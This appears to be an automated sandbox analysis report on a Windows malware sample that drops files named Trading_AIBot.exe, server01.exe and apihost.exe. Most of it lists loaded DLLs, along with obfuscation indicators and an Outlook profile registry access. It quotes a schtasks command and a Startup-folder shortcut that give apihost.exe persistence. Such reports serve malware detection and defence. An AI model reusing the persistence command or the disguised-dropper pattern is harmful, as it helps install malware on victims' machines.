                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                              Source: F7Xu8bRnXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: _.pdb source: F7Xu8bRnXT.exe, 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmp, F7Xu8bRnXT.exe, 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                              Source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                              Source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                              Source: Trading_AIBot.exe.1.drStatic PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: F7Xu8bRnXT.exeStatic PE information: real checksum: 0x23bfb should be: 0x60b09
                              Source: Trading_AIBot.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                              Source: server01.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x25aa6
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_02184F57 push edx; ret 1_2_02184F63
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_0218474F pushad ; retf 1_2_02184755
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 3_2_00C2AFA9 pushad ; iretd 3_2_00C2AFAA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_041F632D push eax; ret 4_2_041F6341
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_070C2270 pushad ; retf 4_2_070C2289
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 11_2_00CAF2F0 push eax; ret 11_2_00CAF2F1
                              Source: 1.2.F7Xu8bRnXT.exe.34f6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Fe9bVredX5jtW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                              Source: 1.2.F7Xu8bRnXT.exe.4ab0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Fe9bVredX5jtW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                              Source: 1.2.F7Xu8bRnXT.exe.3534590.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Fe9bVredX5jtW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile created: C:\Users\user\AppData\Local\Temp\server01.exeJump to dropped file
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
